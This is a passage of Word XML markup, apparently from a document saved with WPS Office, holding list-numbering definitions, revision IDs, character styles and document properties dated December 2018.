    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E7C208AF"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="26070840"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26070840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3D77C1EE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3D77C1E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492F2D9E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="492F2D9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D8B0D98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D8B0D9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7F57594B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7F57594B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircleChinese"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0" w:firstLine="0" w:firstLineChars="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7449DB"/>
    <w:rsid w:val="09886CC0"/>
    <w:rsid w:val="0AEC582A"/>
    <w:rsid w:val="0B9E7A7C"/>
    <w:rsid w:val="0F25339E"/>
    <w:rsid w:val="0F6B0200"/>
    <w:rsid w:val="110F6F25"/>
    <w:rsid w:val="12DE2DD7"/>
    <w:rsid w:val="13EE22E5"/>
    <w:rsid w:val="159E35B3"/>
    <w:rsid w:val="15D70020"/>
    <w:rsid w:val="175B1889"/>
    <w:rsid w:val="18C91169"/>
    <w:rsid w:val="193E7E12"/>
    <w:rsid w:val="19EC762B"/>
    <w:rsid w:val="1A2830E0"/>
    <w:rsid w:val="1A7B7857"/>
    <w:rsid w:val="1BA377C3"/>
    <w:rsid w:val="21515C1F"/>
    <w:rsid w:val="21F625ED"/>
    <w:rsid w:val="2218057C"/>
    <w:rsid w:val="2406421C"/>
    <w:rsid w:val="24C60021"/>
    <w:rsid w:val="276F1676"/>
    <w:rsid w:val="27C0615E"/>
    <w:rsid w:val="2801145D"/>
    <w:rsid w:val="28102FE7"/>
    <w:rsid w:val="28EC4FC7"/>
    <w:rsid w:val="298B470A"/>
    <w:rsid w:val="2A0F6169"/>
    <w:rsid w:val="2F541F44"/>
    <w:rsid w:val="35663588"/>
    <w:rsid w:val="39CA365A"/>
    <w:rsid w:val="3C4C761A"/>
    <w:rsid w:val="3CF54F86"/>
    <w:rsid w:val="3D1950E8"/>
    <w:rsid w:val="3D3D0E33"/>
    <w:rsid w:val="3DD46B93"/>
    <w:rsid w:val="3E4D5AA8"/>
    <w:rsid w:val="3E585CA8"/>
    <w:rsid w:val="40B624C7"/>
    <w:rsid w:val="41CB29B0"/>
    <w:rsid w:val="44F90809"/>
    <w:rsid w:val="45972443"/>
    <w:rsid w:val="459C2CE6"/>
    <w:rsid w:val="46CF4F17"/>
    <w:rsid w:val="4A706251"/>
    <w:rsid w:val="4A933989"/>
    <w:rsid w:val="4B827A58"/>
    <w:rsid w:val="4C4F57AF"/>
    <w:rsid w:val="52EA505F"/>
    <w:rsid w:val="534945C7"/>
    <w:rsid w:val="54E320EB"/>
    <w:rsid w:val="586617D3"/>
    <w:rsid w:val="59F23AF3"/>
    <w:rsid w:val="5DFB22DE"/>
    <w:rsid w:val="5E80451E"/>
    <w:rsid w:val="5F322E3F"/>
    <w:rsid w:val="631E2726"/>
    <w:rsid w:val="637B74CC"/>
    <w:rsid w:val="63BB094F"/>
    <w:rsid w:val="64023548"/>
    <w:rsid w:val="64607B73"/>
    <w:rsid w:val="66226667"/>
    <w:rsid w:val="66FE54E6"/>
    <w:rsid w:val="696042FD"/>
    <w:rsid w:val="6BC8682B"/>
    <w:rsid w:val="6E7A0E08"/>
    <w:rsid w:val="71625998"/>
    <w:rsid w:val="71BA7928"/>
    <w:rsid w:val="73014377"/>
    <w:rsid w:val="75065360"/>
    <w:rsid w:val="7597335D"/>
    <w:rsid w:val="7C227DE0"/>
    <w:rsid w:val="7C3962AD"/>
    <w:rsid w:val="7D5B3378"/>
    <w:rsid w:val="7EEA79EB"/>
    <w:rsid w:val="7FF6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333333"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="333333"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="quote"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="6B6B6B"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="tip"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="999999"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="name"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="2E2E2E"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="article-type"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="article-type1"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="red"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="txt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Sloth</dc:creator>
  <cp:lastModifiedBy>无为小青年</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-05T13:18:34Z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  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSORubyTemplateID" linkTarget="0">
    <vt:lpwstr>6</vt:lpwstr>
  </property>
</Properties>
</file>